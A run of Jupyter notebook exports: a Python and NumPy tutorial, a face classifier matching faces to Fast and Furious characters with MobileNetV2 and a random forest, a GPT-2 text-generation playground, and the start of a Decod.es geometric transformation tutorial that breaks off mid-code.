# unzip list x, y, z = zip(*[(3,4,7), (12,15,19), (30,60,90)]) print(x, y, z) ``` _____ ``` map(abs,[-2,0,-5,6,-7]) list(map(abs,[-2,0,-5,6,-7])) ``` https://www.geeksforgeeks.org/python-map-function/ ``` numbers1 = [1, 2, 3] numbers2 = [4, 5, 6] result = map(lambda x, y: x + y, numbers1, numbers2) list(result) ``` ____ Use a lambda function and the map function to compute a result from the followimg 3 lists.<br> If the element in the third list is divisible by 3 return 3*x, otherwise return 2*y. ``` numbers1 = [1, 2, 3, 4, 5, 6] numbers2 = [7, 8, 9, 10, 11, 12] numbers3 = [13, 14, 15, 16, 17, 18] result = map(lambda x, y, z: 3*x if z%3 ==0 else 2*y, \ numbers1, numbers2, numbers3) list(result) def compute_res(x,y,z): res = None if z%3 == 0: res = 3*x else: res = 2*y return res result = map(compute_res, numbers1, numbers2, numbers3) list(result) ``` ____ ``` test_list = [3,4,5,6,7] result = filter(lambda x: x > 4, test_list) result list(result) # Filter to remove empty structures or 0 test_list = [3, 0, 5, None, 7, "", "AACG", []] result = filter(bool, test_list) list(result) ``` ____ ``` from functools import reduce reduce(lambda x,y: x+y, [47,11,42,13]) ``` <img src = https://www.python-course.eu/images/reduce_diagram.png width=300/> https://www.python-course.eu/lambda.php https://www.geeksforgeeks.org/reduce-in-python/ https://www.tutorialsteacher.com/python/python-reduce-function ``` test_list = [1,2,3,4,5,6] # compute factorial of n n=5 reduce(lambda x, y: x*y, range(1, n+1)) ``` _____ ### Input/Output and File Handling #### Reading user input: the `input()` function ``` # reads text, evaluates expression res = input() while res != "STOP": print("input", res) res = input() ``` File is a named location on disk to store related information It is used to permanently store data in a non-volatile memory (e.g. hard disk)<br> https://www.programiz.com/python-programming/file-operation #### Open a file for reading or writing https://docs.python.org/3/library/functions.html#open ```python open(file, mode='r', buffering=-1, encoding=None, errors=None, newline=None, closefd=True, opener=None) fileObj = open(fileName, ‘r’) # open file for reading, r+ fileObj = open(fileName, ‘w’) # open file for writing, w+ fileObj = open(fileName, ‘a’) # open file for appending, a+ ``` (Note: fileName must be a string or reference to one) The file object is iterable by line ``` #help(open) ``` <b>Write</b> ``` # open file and write lines into a file test_file = open("test.txt", mode = "w") test_file.write("Writing some text.\n") test_file.write("Writing another line.") test_file.close() for elem in dir(test_file): if "_" not in elem: print(elem) ``` <b>Close file</b> ``` # close() help(test_file.close) ``` <b>Read</b> ``` # open file and read file contents test_file = open("test.txt", "r") res = test_file.read() print(res) test_file.close() ``` <b>Read line</b> ``` test_file = open("test.txt", "r") res = test_file.readlines() print(res) test_file.close() ``` <b>Go at position</b> ``` # seek test_file = open("test.txt", "r") test_file.seek(10) res = test_file.readline() print(res) print(test_file.tell()) test_file.close() ``` <b>Return current position</b> ``` # tell ``` ### Context manager <b>with: give code context</b> The special part about with is when it is paired with file handling or database access functionality ``` # Without with test_file = open("test.txt",'r') print(test_file.read()) test_file.close() # With with :) with open("test.txt",'r') as test_file: print(test_file.read()) ``` The file is opened and processed. <br> As soon as you exit the with statement, <b>the file is closed automatically</b>. ``` # parsing files def parse_line(line): return line.strip().split(" ") with open("test.txt",'r') as test_file: line = test_file.readline() while (line != ""): print(parse_line(line)) line = test_file.readline() ``` ### <font color = "red">Exercise</font>: Open the file test.txt and add 10 lines in a for loop. The line should contain: Line index Line 0 Line 1 https://www.tutorialspoint.com/python/python_files_io.htm https://www.tutorialspoint.com/python/file_methods.htm _____ ### NumPy - Numeric python <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/1/1a/NumPy_logo.svg/1200px-NumPy_logo.svg.png" alt="NumPy logo" width = "100"> NumPy (np) is the premier Python package for scientific computing https://numpy.org Its powerful comes from the <b>N-dimensional array object</b> np is a *lower*-level numerical computing library. This means that, while you can use it directly, most of its power comes from the packages built on top of np: * Pandas (*Pan*els *Da*tas) * Scikit-learn (machine learning) * Scikit-image (image processing) * OpenCV (computer vision) * more... <b>Importing NumPy<br> Convention: use np alias</b> ``` import numpy as np ``` <img src="https://www.oreilly.com/library/view/elegant-scipy/9781491922927/assets/elsp_0105.png" alt="data structures" width="500"> <b>NumPy basics</b> Arrays are designed to: * handle vectorized operations lists are not * if you apply a function it is performed on every item in the array, rather than on the whole array object * store multiple items <b>of the same data type</b> * have 0-based indexing * Missing values can be represented using `np.nan` object * the object `np.inf` represents infinite * Array size cannot be changed, should create a new array * An equivalent numpy array occupies much less space than a python list of lists <b>Create Array</b><br> https://docs.scipy.org/doc/numpy-1.13.0/user/basics.creation.html ``` # Build array from Python list vector = np.array([1,2,3]) vector # matrix with zeros np.zeros((3,4), dtype = int) # matrix with 1s np.ones((3,4), dtype=int) # matrix with a constant value value = 20 np.full((3,4), value) # Create a 4x4 identity matrix np.eye(4) # arange - numpy range np.arange(10, 30, 2) # evenly spaced numbers over a specified interval ev_array = np.linspace(1, 10, 20) print(ev_array) ev_array.shape ``` <b>Random data</b><br> https://docs.scipy.org/doc/numpy-1.13.0/reference/routines.random.html ``` # Create an array filled with random values np.random.random((3,4)) # Create an array filled with random values from the standard normal distribution np.random.randn(3,4) # Generate the same random numbers every time # Set seed np.random.seed(10) np.random.randn(3,4) np.random.seed(10) print(np.random.randn(3,4)) print(np.random.randn(3,4)) np.random.seed(100) print(np.random.randn(3,4)) ``` ```python # Create the random state rs = np.random.RandomState(100) ``` <b>Basic array attributes:</b> * shape: array dimension * size: Number of elements in array * ndim: Number of array dimension (len(arr.size)) * dtype: Data-type of the array * T: The transpose of the array ``` matrix = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]]) matrix # let's check them out matrix.shape matrix.size matrix = np.array([[[1,2],[2,3],[3,4]],[[4,5],[4,6],[6,7]]]) matrix.ndim matrix.dtype matrix.T matrix ``` <b>Reshaping</b> ``` matrix # Reshaping matrix_reshaped = matrix.reshape(2,6) matrix_reshaped ``` <b>Slicing/Indexing</b> ``` # List-like matrix_reshaped[1][1] matrix_reshaped[1,3] matrix_reshaped[1,:3] matrix_reshaped[:2,:3] # iterrating ... let's print the elements of matrix_reshaped nrows = matrix_reshaped.shape[0] ncols = matrix_reshaped.shape[1] for i in range(nrows): for j in range(ncols): print(matrix_reshaped[i,j]) # Fun arrays checkers_board = np.zeros((8,8),dtype=int) checkers_board[1::2,::2] = 1 checkers_board[::2,1::2] = 1 print(checkers_board) ``` Create a 2d array with 1 on the border and 0 inside ``` boarder_array = np.zeros((8,8),dtype=int) boarder_array[0,:] = 1 boarder_array boarder_array = np.ones((8,8),dtype=int) boarder_array[1:-1,1:-1] = 0 boarder_array boarder_array[:,-1] ``` <b>Performance</b> test_list = list(range(int(1e6))) <br> test_vector = np.array(test_list) ``` test_list = list(range(int(1e6))) test_vector = np.array(test_list) %%timeit sum(test_list) %%timeit np.sum(test_vector) ``` https://numpy.org/devdocs/user/quickstart.html#universal-functions <b>Matrix operations</b> https://www.tutorialspoint.com/matrix-manipulation-in-python<br> Arithmetic operators on arrays apply elementwise. <br> A new array is created and filled with the result. <b>Array broadcasting</b><br> https://docs.scipy.org/doc/numpy/user/basics.broadcasting.html<br> The term broadcasting describes how numpy treats arrays with different shapes during arithmetic operations. <br> Subject to certain constraints, the smaller array is “broadcast” across the larger array so that they have compatible shapes. <img src = "https://www.tutorialspoint.com/numpy/images/array.jpg" height=10/> https://www.tutorialspoint.com/numpy/numpy_broadcasting.htm ``` matrix np.array([1,2,3,4]).reshape(4,1) matrix + np.array([1,2,3,4]).reshape(4,1) matrix + np.array([1,2,3]) matrix * np.array([1,2,3,4]).reshape(4,1) matrix2 = np.array([[1,2,3],[5,6,7],[1,1,1],[2,2,2]]) matrix2 matrix * matrix2 # matrix multiplication matrix.dot(np.array([1,2,3]).reshape(3,1)) # matrix multiplication - more recently matrix@(np.array([1,2,3]).reshape(3,1)) # stacking arrays together np.vstack((matrix,matrix2)) np.hstack((matrix,matrix2)) # splitting arrays np.vsplit(matrix,2) np.hsplit(matrix,(2,3)) ``` <b>Copy</b> ``` matrix # shallow copy - looks at the same data matrix_copy = matrix matrix_copy1 = matrix.view() print(matrix_copy) print(matrix_copy1) print(matrix) print(matrix_copy) print(matrix_copy1) matrix_copy1[0,0] = 5 # deep copy matrix_copy2 = matrix.copy() print(matrix_copy2) matrix_copy2[0,0] = 7 print(matrix) print(matrix_copy) print(matrix_copy1) print(matrix_copy2) ``` <b>More matrix computation</b> ``` # conditional subsetting matrix[(6 < matrix[:,0])] matrix[(4 <= matrix[:,0]) & (matrix[:,0] <= 7) & (2 <= matrix[:,1]) & (matrix[:,1] <= 7),] matrix # col mean matrix.mean(axis = 0) # row mean matrix.mean(axis = 1) # unique values and counts matrix = np.random.random((3,4), ) matrix = np.array([[ 5, 2, 3], [ 4, 5, 6], [ 7, 8, 9], [10, 11, 12]]) uvals, counts = np.unique(matrix, return_counts=True) print(uvals,counts) ``` https://www.w3resource.com/python-exercises/numpy/index.php Create a matrix of 5 rows and 6 columns with numbers from 1 to 30. Add 2 to the odd values of the array. ``` matrix = np.arange(1,31).reshape(5,6) matrix[matrix%2==1 ] += 2 matrix ``` Normalize the values in the matrix. Substract the mean and divide by the standard deviation. ``` mat_mean = np.mean(matrix) mat_std = np.std(matrix) matrix_norm = (matrix - mat_mean)/mat_std matrix_norm matrix ``` Create a random array (5 by 3) and compute: * the sum of all elements * the sum of the rows * the sum of the columns ``` matrix = np.random.rand(5,3) print(matrix) matrix.sum() matrix.sum(1) matrix.sum(0) #Given a set of Gene Ontology (GO) terms and the genes that are associated with these terms find the gene #that is associated with the most GO terms go_terms=np.array(["cellular response to nicotine", "cellular response to hypoxia", "cellular response to lipid"]) genes=np.array(["BAD","KCNJ11","MSX1","CASR","ZFP36L1"]) assoc_matrix = np.array([[1,1,0,1,0],[1,0,0,1,1],[1,0,0,0,0]]) print(assoc_matrix) max(assoc_matrix.sum(0)) genes[0] ```
github_jupyter
# Too Fast. Too Furious. (AKA This Week.) **Goal:** Build a classification model to classify unseen faces to 'match' those of characters from the beloved _**Fast and Furious**_ movie franchise. ``` # # Required installations (run once) # !brew install wget # Added by Miles # !pip install --upgrade --ignore-installed wrapt # Added by Miles # !pip install tensorflow==2.0.0-beta0 # Edited by Miles (switch to CPU version) # !pip install tensorflow_datasets # Added by Miles %matplotlib inline %load_ext autoreload %autoreload 2 # 1 would be where you need to specify the files #%aimport helper #%aimport image_feature_extractor ``` ## Import Libraries ``` import os import numpy as np from io import BytesIO # Visualization import matplotlib.pyplot as plt # ML import tensorflow as tf keras = tf.keras from sklearn.model_selection import train_test_split from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import BaggingClassifier, RandomForestClassifier from sklearn.metrics import (accuracy_score, confusion_matrix , classification_report) from sklearn.pipeline import Pipeline import pickle import dill import joblib # Image handling from PIL import Image # Data storage import boto3 # AWS import pymongo # MongoDB # Custom import helper # Helper functions from image_feature_extractor import ImageFeatureExtractor ``` ## Data Procurement To set up our data ingestion process, we centralized all our images to a local folder. They are also stored on an **AWS S3 bucket**. #### Future Improvement - Revise to pull directly from s3 bucket. ``` image_paths = [] target_labels = [] for dirpath, dirnames, filenames in os.walk('downloads/all_photos'): #for dirpath, dirnames, filenames in os.walk('test_data'): for ff in filenames: if ff[:1] != '.': curr_path = os.path.join('.',dirpath, ff) temp_name = dirpath[dirpath.rfind('/') + 1:] target_labels.append(temp_name) image_paths.append(curr_path) ``` ## Machine Learning Pipeline We constructed a pipeline that consists of the following: - We created a class that uses a pre-trained model (MobileNetV2) to extract features. - A Random Forest classifier built on top of those extracted features. ``` # Instantiate our feature extractor extractor = ImageFeatureExtractor() # Instantiate our chosen classification model #forest = RandomForestClassifier(n_estimators=10, n_jobs=-1) forest = RandomForestClassifier(n_estimators=10) # Create the ML pipeline pipe = Pipeline([ ('extract_deep_features', extractor), ('classify', forest) ]) # Create train/test split X_train, X_test, y_train, y_test = train_test_split(image_paths ,target_labels ,random_state=57 ,stratify=target_labels) # Fit on training data! pipe.fit(X_train, y_train) pipe.predict(X_test) pipe.score(X_test, y_test) pipe.score(X_train, y_train) ``` ### Test URL Inputs ``` # Random Testing vinny = ['http://www.sosia.biz/files/immagini/1289210942-DSCF0851.JPG'] laura = ['https://cdn-images-1.medium.com/max/1200/1*jM7PrjvG20306cXwjgN6' + 'hA@2x.jpeg'] mia = ['https://media.licdn.com/dms/image/C4E03AQEUu7pgy0zqrw/profile-' + 'displayphoto-shrink_200_200/0?e=1563408000&v=beta&t=IQESr0Ho16othge' + 'TRgp0nrGlXRkv6c-WiSHf_nCzRlk'] werlindo = ['https://cdn-images-1.medium.com/max/1200/2*T33SKqm3ldv2QkT' + 'E3QQ0Dw.jpeg'] pipe.predict(vinny) pipe.predict(laura) pipe.predict(mia) pipe.predict(werlindo) ``` ### In A Pickle. So it appears at this moment can't **pickle** a **pipeline** with a **Keras model** embedded in it, so will adjust to just **pickle the Random Forest**. ``` # Extract the random forest model = pipe.named_steps['classify'] type(model) pkl_model_filenm = 'model.pkl' ``` Create the pickled file: ``` with open(pkl_model_filenm, 'wb') as file: pickle.dump(model, file) ``` Testing loading of the pickled file: ``` # Load from file with open(pkl_model_filenm, 'rb') as file: pickle_model = pickle.load(file) type(pickle_model) features_for_web = extractor.transform(werlindo) ``` # Issues with Pickling the Pipeline ### Encountered Errors: - can't pickle _thread.RLock objects - can't pickle SwigPyObject objects ### Info? - [Keras models not pickle-able?](https://github.com/keras-team/keras/issues/10528) ``` # Save to file in the current working directory pkl_model_filenm = "model.pkl" ``` ### Try 1 - Pickle https://pypi.org/project/dill/ ``` with open(pkl_model_filenm, 'wb') as file: pickle.dump(pipe, file) # Load from file with open(pkl_model_filenm, 'rb') as file: pickle_model = pickle.load(file) ``` ##### Calculate the accuracy score and predict target values score = pickle_model.score(X_test, y_test) print("Test score: {0:.2f} %".format(100 * score)) predict = pickle_model.predict(X_test) ### Try 2 - Dill https://pypi.org/project/dill/ ``` with open(pkl_model_filenm, "wb") as dill_file: dill.dump(pipe, dill_file) ``` ### Try 3 - joblib https://scikit-learn.org/stable/modules/model_persistence.html ``` # Export the classifier to a file joblib.dump(pipe, 'model.joblib') ``` ### Try 4 - joblib 'hack'? https://stackoverflow.com/questions/37984304/how-to-save-a-scikit-learn-pipline-with-keras-regressor-inside-to-disk ``` # Save the Keras model first: # pipeline.named_steps['estimator'].model.save('keras_model.h5') pipe.named_steps['extract_deep_features'].model.save('deep_feat') # This hack allows us to save the sklearn pipeline: pipe.named_steps['classify'].model = None # Finally, save the pipeline: joblib.dump(pipe, 'model.pkl') ``` --- --- # Appendix ## Development on MongoDB storage. Not currently implemented. Intended to eventually be integrated into the **ImageFeatureExtractor()** class. ``` # Instantiate Class extractor = ImageFeatureExtractor() # Store Features - list of arrays features = extractor.transform(image_paths) # Turn into list of lists because easier with MongoDB features_list = [feature.tolist() for feature in features] # Zip them so can iterate through them zipped_imgs = list(zip(image_paths,features_list)) # Create list of dictionaries; so can be ingested by MongoDB list_of_dicts = [{'url': img[0], 'features':img[1]} for img in zipped_imgs] ``` ### Upload results to MongoDB ``` # Define path to secret #secret_path = os.path.join(os.environ['HOME'], '.secret', 'mongo.json') # keys = helper.get_keys(secret_path) # mongo_user = keys['user_id'] # mongo_pw = keys['password'] # Instantiate client client = pymongo.MongoClient("mongodb+srv://" + mongo_user + ":" + mongo_pw + "@dsaf-oy1s0.mongodb.net/test?retryWrites=true") # Get DB, Collection db = client['furious'] coll = db['images'] # Wipe collection to start fresh coll.delete_many({}) # Insert Results coll.insert_many(list_of_dicts) ``` ### Testing getting the features back ``` features_returned = [np.array(x['features']) for x in coll.find()] features_returned ``` --- ## Development: Classification Models ``` target = target_labels X_train, X_test, y_train, y_test = train_test_split(features, target, test_size = 0.25, random_state=123) ``` ### Development: Decision Trees ``` tree_clf = DecisionTreeClassifier(criterion = "gini", max_depth = 5) tree_clf.fit(X_train, y_train) tree_clf.feature_importances_ pred = tree_clf.predict(X_test) print(confusion_matrix(y_test, pred)) print(classification_report(y_test, pred)) ``` ### Random Forest ``` forest = RandomForestClassifier(n_estimators=20) forest.fit(X_train, y_train) forest.score(X_train, y_train) forest.score(X_test, y_test) forest.predict(X_train) ```
github_jupyter
<a href="https://colab.research.google.com/github/ilopezfr/gpt-2/blob/master/gpt-2-playground_.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # GPT-2 Playground ## Background In this Jupyter notebook you can play around with of **Open AI's GPT-2** Language Model from the paper **[Language Models are Unsupervised Multitask Learners](https://d4mucfpksywv.cloudfront.net/better-language-models/language-models.pdf)**. You'll be able to choose between the small (**117M** parameters) , medium (**345M** parameters), large (**774M** parameters) and XL versions (**1.5B** parameters) version of GPT-2. According to the authors, the GPT-2 algorithm was trained on the task of *language modeling*--- which tests a program's ability to predict the next word in a given sentence--by ingesting huge numbers of articles, blogs, and websites. By using just this data it achieved state-of-the-art scores on a number of unseen language tests, an achievement known as *zero-shot learning.* It can also perform other writing-related tasks, like translating text from one language to another, summarizing long articles, and answering trivia questions. Open AI decided not to release the dataset, training code, or the full GPT-2 model weights. This is due to the concerns about large language models being used to generate deceptive, biased, or abusive language at scale. Some examples of the applications of these models for malicious purposes are: * Generate misleading news articles * Impersonate others online * Automate the production of abusive or faked content to post on social media * Automate the production of spam/phishing content As one can imagine, this combined with recent advances in generation of synthetic imagery, audio, and video implies that it's never been easier to create fake content and spread disinformation at scale. The public at large will need to become more skeptical of the content they consume online. ---- **PRs to improve the notebook are welcomed !** ---- ## Steps Before starting, **set *Runtime Type* to *GPU*** on the top menu bar. ###1. Installation Clone the repo, install dependencies, and download the model weights. You can choose between the small 117M, medium 345M, large 774M model, xl 1.5B model or all of them. ``` !git clone https://github.com/ilopezfr/gpt-2/ import os os.chdir('gpt-2') #Download model weights # !python download_model.py 117M # !python download_model.py 345M # !python download_model.py 774M !python download_model.py 1558M # XL Model ``` **UPDATE: 02/02/2021: Install older TensorFlow version** Source code relies on older TensorFlow version. Installing TF v1.15 seems to fix the issue of *ModuleNotFoundError when training the model*. (Workaround found here: https://colab.research.google.com/notebooks/tensorflow_version.ipynb#scrollTo=8UvRkm1JGUrk) ``` %tensorflow_version 1.x # !pip -q install tensorflow==1.15 && pip -q install tensorflow-gpu==1.15 # !pip -q install 'tensorflow-estimator<1.15.0rc0,>=1.14.0rc0' --force-reinstall import tensorflow print(tensorflow.__version__) import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # disable all debugging logs !pip3 -q install -r /content/gpt-2/reqs.txt #!pip3 -q install -r /content/gpt-2/requirements.txt ``` ### 2. Unconditional sample generation *WARNING: Samples are unfiltered and may contain offensive content.* To generate unconditional samples from the small model: ``` !python3 src/generate_unconditional_samples.py ``` There are a few flags available, with a default value: - `model_name = '1558M' ` : choose between 117M, 345M, 774M, and 1558M models. If not specified, the default is 117M. - `seed = None` || a random value is generated unless specified. give a specific integer value if you want to reproduce same results in the future. - `nsamples = 1` || specify the number of samples you want to print - `length = None` || number of tokens (words) to print on each sample. - `batch_size= 1` || how many inputs you want to process simultaneously. *only affects speed/memory* - `temperature = 1` || float between 0 and 1. scales logits before sampling prior to softmax. higher temperature results in more random completions. - `top_k = 0` || Integer value controlling diversity. Truncates the set of logits considered to those with the highest values. 1 means only 1 word is considered for each step (token), resulting in deterministic completions. 40 means 40 words are considered at each step. 0 (default) is a special setting meaning no restrictions. 40 generally is a good value. *Note: This part takes a while (~5min) until it starts printing gpt2 samples* ``` !python3 src/generate_unconditional_samples.py --model_name='1558M' --nsamples=2 --top_k=40 --temperature=0.7 | tee samples !python3 src/generate_unconditional_samples.py --model_name='1558M' --nsamples=2 --top_k=2 !python3 src/generate_unconditional_samples.py --nsamples=2 --top_k=80 ``` ## Conditional sample generation To generate conditional samples from the small model: ``` !python3 src/interactive_conditional_samples.py ``` It comes with a few flags available, with a default value: - `model_name = '117M' ` : choose between 117M and 345M models. By default is 117M. - `seed = None` || a random value is generated unless specified. give a specific integer value if you want to reproduce same results in the future. - `nsamples = 1` || specify the number of samples you want to print - `length = None` || number of tokens (words) to print on each sample. - `batch_size= 1` || how many inputs you want to process simultaneously. *only affects speed/memory* - `temperature = 1` || float between 0 and 1. scales logits before sampling prior to softmax. higher temperature results in more random completions. - `top_k = 0` || Integer value controlling diversity. Truncates the set of logits considered to those with the highest values. 1 means only 1 word is considered for each step (token), resulting in deterministic completions. 40 means 40 words are considered at each step. 0 (default) is a special setting meaning no restrictions. 40 generally is a good value. The authors tested the model performance on a few different language tasks, including **reading comprehension, text completion, summarization, translation, and question-answering.** Below are a few examples selected to test the aforementioned behaviors: ### 1. Text Completion - Context: random unseen text Sample prompt 1: ``` In a shocking finding, scientist discovered a herd of unicorns living in a remote, previously unexplored valley, in the Andes Mountains. Even more surprising to the researchers was the fact that the unicorns spoke perfect English. ``` Sample prompt 2: ([*Voight-Kampff test*](https://www.youtube.com/watch?v=Umc9ezAyJv0)) ``` You're in a desert, walking along in the sand, when all of a sudden you look down and see a tortoise, Leon. It's crawling toward you. You reach down, you flip the tortoise over on its back. The tortoise lays on its back, its belly baking in the hot sun, beating its legs trying to turn itself over, but it can’t, not without your help. But you’re not helping. Why is that? ``` Sample prompt 3: ``` I've seen things you people wouldn't believe. Attack ships on fire off the shoulder of Orion. I watched C-beams glitter in the dark near the Tannhäuser Gate. All those moments will be lost in time, like tears in rain. Time to die. ``` Sample prompt 4: ``` Outfit 1: Typical This pairing was the first outfit I thought of when I bought the shoes. It’s like a summer version of this Jake Grantham outfit; in fact, my shoes are close to the colors of his Nike Racers! Instead of a heavy Harris Tweed jacket and denim shirt, I’m wearing a cotton DB jacket and and a linen shirt. Both fabrics (in these colors) are an absolute must for summer, as they go with both dark and and light pants! As you can see, they pair wonderfully with the dark jeans and shoes. It’s a pseudo menswear/prep outfit. Overall, this is a very casual outfit which is why I paired my sneakers with it. I’m not about wearing a full wool suit with sneakers (as GQ shows a lot) but I’m definitely open to keeping things casual, like this cotton DB. Casual fabrics are key to pulling off your sneakers in a dressed down menswear outfit. I’d even suggest to wear these sneakers with a khaki chino suit or a white linen suit. Just be sure to ditch the tie or wear a tee or polo; wearing a tie with sneakers is a bit too much ``` Sample prompt 5: ``` - Some of the most glorious historical attractions in Spain date from the period of Muslim rule, including The Mezquita, built as the Great Mosque of Cordoba and the Medina Azahara, also in Cordoba, the Palace of al-Andalus; and the Alhambra in Granada, a splendid, intact palace. ``` Sample prompt 6: ``` How can Artificial Intelligence be dangerous? Most researchers agree that a superintelligent AI is unlikely to exhibit human emotions like love or hate, and that there is no reason to expect AI to become intentionally benevolent or malevolent. Instead, when considering how AI might become a risk, experts think two scenarios most likely: ``` Sample prompt 7: ``` Our solar system consists of the inner and outer planets, separated by an asteroid belt. It has ``` Sample prompt 8: ``` The 10 best foods are: 1. Serrano Ham 2. Manchego Cheese 3. ``` Sample prompt 9: ``` Real Madrid boss Santiago Solari admitted his team put in a 'weak performance' in their 1-0 Copa del Rey loss to local rivals Leganes. Despite losing the game, Los Blancos will progress to the quarter final stages of the tournament, winning the tie 3-1 on aggregate thanks to a 3-0 victory in the first leg. "It was a difficult game, but the performance was weak," Real Madrid boss Santi Solari on the ``` Sample prompt 10: ``` Roses are read, violets are blue, ``` ``` !python3 src/interactive_conditional_samples.py --model_name='1558M' --nsamples=2 --top_k=40 --temperature=.80 !python3 src/interactive_conditional_samples.py --model_name='345M' --nsamples=2 --top_k=100 --temperature=1 ``` ### 2. Question-Answering - Context: passage, some question/answer pairs, and token `A:` - For a single word answer (i.e.: Yes/No, city), set flag `length=1` Sample prompt 1 ([*The Baseline test*](https://bladerunner.fandom.com/wiki/Baseline_Test)) ``` Q: What's it like to hold the hand of someone you love? A: Interlinked. Q: Do they teach you how to feel finger to finger? A: Interlinked. Q: Do you long for having your heart interlinked? A: ``` Sample prompt 2: ``` The 2008 Summer Olympics torch relay was run from March 24 until August 8, 2008, prior to the 2008 Summer Olympics, with the theme of “one world, one dream”. Plans for the relay were announced on April 26, 2007, in Beijing, China. The relay, also called by the organizers as the “Journey of Harmony”, lasted 129 days and carried the torch 137,000 km (85,000 mi) – the longest distance of any Olympic torch relay since the tradition was started ahead of the 1936 Summer Olympics. After being lit at the birthplace of the Olympic Games in Olympia, Greece on March 24, the torch traveled to the Panathinaiko Stadium in Athens, and then to Beijing, arriving on March 31. From Beijing, the torch was following a route passing through six continents. The torch has visited cities along the Silk Road, symbolizing ancient links between China and the rest of the world. The relay also included an ascent with the flame to the top of Mount Everest on the border of Nepal and Tibet, China from the Chinese side, which was closed specially for the event. Q: What was the length of the race? A: 137,000 km Q: Was it larger than previous ones? A: No Q: Where did the race begin? A: Olympia, Greece Q: Where did they go after? A: Athens Q: How many days was the race? A: seven Q: Did they visit any notable landmarks? A: Panathinaiko Stadium Q: And did they climb any mountains? A: ``` ``` !python3 src/interactive_conditional_samples.py --model_name='345M' --nsamples=10 --top_k=40 --temperature=.80 --length=1 ``` ### 3. Summarization - Context: article and text *`TL;DR:`* or *`Summary:`* at the end. Sample prompt: ``` Theodore McCarrick is the most senior Catholic figure to be dismissed from the priesthood in modern times. US Church officials said allegations he had sexually assaulted a teenager five decades ago were credible. Mr McCarrick, 88, had previously resigned but said he had "no recollection" of the alleged abuse. "No bishop, no matter how influential, is above the law of the Church," Cardinal Daniel DiNardo, president of the United States Conference of Catholic Bishops said in a statement. "For all those McCarrick abused, I pray this judgment will be one small step, among many, toward healing." The alleged abuses may have taken place too long ago for criminal charges to be filed because of the statute of limitations. Mr McCarrick was the archbishop of Washington DC from 2001 to 2006. Since his resignation last year from the College of Cardinals, he has been living in seclusion in a monastery in Kansas. He was the first person to resign as a cardinal since 1927. He is among hundreds of members of the clergy accused of sexually abusing children over several decades and his dismissal comes days before the Vatican hosts a summit on preventing child abuse. The Vatican said Pope Francis had ruled Mr McCarrick's expulsion from the clergy as definitive, and would not allow any further appeals against the decision. TL;DR: ``` ``` !python3 src/interactive_conditional_samples.py --nsamples=3 --length=100 --temperature=1 ``` ### 4. Translation - Context: a few example pairs of the format *`english_sentence = spanish_sentence`*, and then *`english_sentence =`* at the end. Sample prompt: ``` Good morning. = Buenos días. I am lost. Where is the restroom? = Estoy perdido. ¿Dónde está el baño? How much does it cost? = ¿Cuánto cuesta? How do you say maybe in Spanish? = ¿Cómo se dice maybe en Español? Would you speak slower, please. = Por favor, habla mas despacio. Where is the book store? = ¿Dónde está la librería? At last a feminist comedian who makes jokes about men. = Por fin un cómico feminista que hace chistes sobre hombres. How old are you? = ``` ``` !python3 src/interactive_conditional_samples.py --model_name='345M' --nsamples=3 --temperature=1 ```
github_jupyter
``` from decodes.core import * from decodes.io.jupyter_out import JupyterOut import math out = JupyterOut.unit_square( ) ``` # Transformations in Code todo ## Xform Objects in Decod.es <img src="http://geometric-computation-images.s3-website-us-east-1.amazonaws.com/3.00.D96 Xform Large.jpg" style="width: 600px; display: inline;"> ``` """ Xform Initialization An Xform object is initialized with values configured to match those of an identity matrix. """ class Xform(object): def __init__(self): self._m = [0.0]*16 self.c11, self.c22, self.c33, self.c44, = 1.0, 1.0, 1.0, 1.0 """ Transformation Management Here, a method is defined that attempts to apply a spatial transformation as described by this Xform matrix to any geometric object given. An appropriate mechanism for doing so is applied on a case-by-case basis, with constituent Points and Vecs transformed separately, stripping away the translation portion of the matrix where needed. If no appropriate means is defined, an error is raised. """ def transform(self,other): # if other is a Point if isinstance(other, Point): # apply the transformation and return a new Point tup = self._xform_tuple(other.to_tuple()) pt = Point(tup[0],tup[1],tup[2]) return pt # if other is a Vec if isinstance(other, Vec): # apply the transformation and return a new Vec tup = self._xform_tuple(other.to_tuple()) vec = Vec(tup[0],tup[1],tup[2]) return vec # if other is a LinearEntity if isinstance(other, LinearEntity): # apply the transformation to the LinearEntity start point other._pt = other._pt*self xf = self.strip_translation() # apply the transformation to the LinearEntity vector other._vec = other._vec*xf # assemble and return a new LinearEntity return other # if other is a CS if isinstance(other, CS): cs = other # apply the transformation to the CS origin tup = self._xform_tuple(cs.origin.to_tuple()) origin = Point(tup[0],tup[1],tup[2]) xf = self.strip_translation() # apply the transformation to each of the CS axis Vecs tup = xf._xform_tuple(cs.x_axis.to_tuple()) x_axis = Vec(tup[0],tup[1],tup[2]) tup = xf._xform_tuple(cs.y_axis.to_tuple()) y_axis = Vec(tup[0],tup[1],tup[2]) # assemble and return a new CS ret = CS(origin, x_axis, y_axis) return ret # if other is a Circle if isinstance(other, Circle): # apply the transformation as if this Circle was a Plane pln = other.plane * self cir = Circle(pln,other.rad) # assemble and return a new Circle return cir # if other is a Plane if isinstance(other, Plane): pln = other # apply the transformation to the Plane origin tup = self._xform_tuple(pln.origin.to_tuple()) origin = Point(tup[0],tup[1],tup[2]) xf = self.strip_translation() # apply the transformation to the Plane normal Vec tup = xf._xform_tuple(pln.normal.to_tuple()) normal = Vec(tup[0],tup[1],tup[2]).normalized() # assemble and return a new Plane pln = Plane(origin, normal) pln.copy_props(other) return pln # if no transformation is defined for this object, raise an error. raise NotImplementedError("I'm sorry. I can't transform that.") """ A Rotation of a Segment Following an earlier example that defined a matrix for rotating vectors, a given Segment seg is rotated by 90 degrees about the origin. """ xf = Xform() xf.c11 = 0 xf.c12 = -1 xf.c21 = 1 xf.c22 = 0 seg *= xf ``` <img src="http://geometric-computation-images.s3-website-us-east-1.amazonaws.com/1.09.P17.jpg" style="width: 200px; display: inline;"> ``` """ Variable Rotation of Segments Here, a function is defined that rotates a given termination Point of a Segment a variable amount as determined by its distance to an attractor Point. For this purpose, a single Xform object is continually altered and applied to each Point. Two given Intervals, ival_dist and ival_spin, control the amount of rotation. """ xf = Xform() def spin(pt): # calculate an angle of rotation ang = Interval.remap(pt.dist(attr_pt),ival_dist,ival_spin) sint, cost = sin(ang), 